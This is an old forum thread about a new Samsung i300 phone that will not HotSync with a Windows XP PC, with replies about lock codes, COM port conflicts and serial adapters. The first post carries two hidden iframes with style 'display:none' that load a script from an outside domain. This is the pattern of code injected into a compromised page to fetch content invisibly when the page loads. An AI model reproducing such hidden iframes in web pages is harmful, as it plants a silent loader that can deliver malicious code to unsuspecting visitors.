+ Reply to Thread

Unhappy Just got the phone - need some help

Hey folks, I got my phone today, and I love it. Well, that is aside from one thing. I can't get the darn thing to sync with my PC. I was on the phone with SprintPCS Tech Support for 45 minutes tonight, and while they were really nice, they couldn't figure out my problem. They (the PC and the i300) just don't see each other. Anyone else have this same problem? And before you ask, all of my settings are set to what the Sprint Tech told me, so it isn't a settings issue, I don't think.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    :. Trent Lott

Any other I300 users that hot sync to that Pc? What winbgws version is installed on your pc? Sorry for typos, walking with i300 now!

Is it accepting your password? The guide says to use the last 4 digits of your phone #, or the default of 0000. Neither of these worked for me, until I found the "lock code" on my packing slip.
    GCraig

Administrator

Arrow

....could be your last digits of you ssn...

tell us what erros (if any) your getting ro whats happening on the screen...

Hey folks, thanks for the replies, I just got back from work. Okay, well it turns out that something is wrong with my COM port /grumble. Because I hooked it up to a friend's computer, installed the software, and it worked fine. So now I have Bejeweled on my i300.
    I know that it is the COM port causing the problem as I also tried to connect my TI-86 Graphing Calculator up to it, and it couldn't open it (the port).
    So.... now my problem seems to be fixing the COM port. Now I asked a couple of tech guys at work (I work at Best Buy), and they recommended that I go into the BIOS. Well I poked around in there, and everything seemed peachy.
    And to answer those questions, I'm running WinXP Pro. And no other users Hot Sync to my PC.
    Any help would be greatly appreciated.

Administrator

Arrow

its possibile that you fried your comm port!

Now why did you go and have to say that? Damn. I'll have to take in my box, have'em take a look at it. Thanks.

Administrator

Arrow

.... sorry....

On a similar note, I recall reading that Palm 4 desktop should be used for optimal performance when installed on Windows XP. Anyone else hear this?

Originally posted by TrentLott
    Now why did you go and have to say that? Damn. I'll have to take in my box, have'em take a look at it. Thanks.
    Go into the hardware manager and remove your COM port. Then reboot. The Os should reinstall your COM port..... see if that takes care of your problem.
    Carl

I know this seems obvious, but sometimes its the obvious things....

You are sure that you don't have any conflicts? There is nothing in your startup folder that is utilizing the com port that if you shut it off, will allow the PC to see your Palm?

HTH...

Craig

I'll do the Device Manager thing, see if it works. The only thing on my taskbar is MSN Messenger, and I only have one other program that would use my COM port (TI GraphLink software), and it no-worky either.

It's not very likely that you "fried" your COM port. It's possible that you have an IRQ conflict, or that your modem is set up to use the same COM # as the serial port you're using. Do you have more than one physical serial port? Try the other one. Play around with the Palm Desktop installation's port-detection scheme -- try manually specifying the port. If you're not very technical, get a geek friend to come by and work with you on it, as bulletin boards like this are a pretty bad diagnosis tool.

Angry I300 PASSWORD PROBLEM

Having similar password problem with new I300. How did you solve it?

Angry ME TOO!

Having same password problem, but no lock code on my packing slip! What did you finally do?

Afteryou've tried 0000, last 4 digits of phone, and finally last 4 of SSN, call customer care. Should be one of the first two numbers. Was your phone activated by someone else initially?

Lightbulb COM problem...May be hardware...

TrentLott

There are probably two 9-pin COM connectors on your PC (COM1 and/or COM2). Try the other one. If neither are working, check inside PC (if you dare) and make certain the cables are connected to the port(s).

Smile Samsung I300 solved

Thanks for your help. I had to ACTIVATE the phone with Sprint first. THEY programmed the unchangeable password at the factory for security reasons. Once I got activated...no problem. My Keyspan DB-9 to USB adapter for the docking port works fine, and the coolest PDA-phone around is up and running! Thanks again...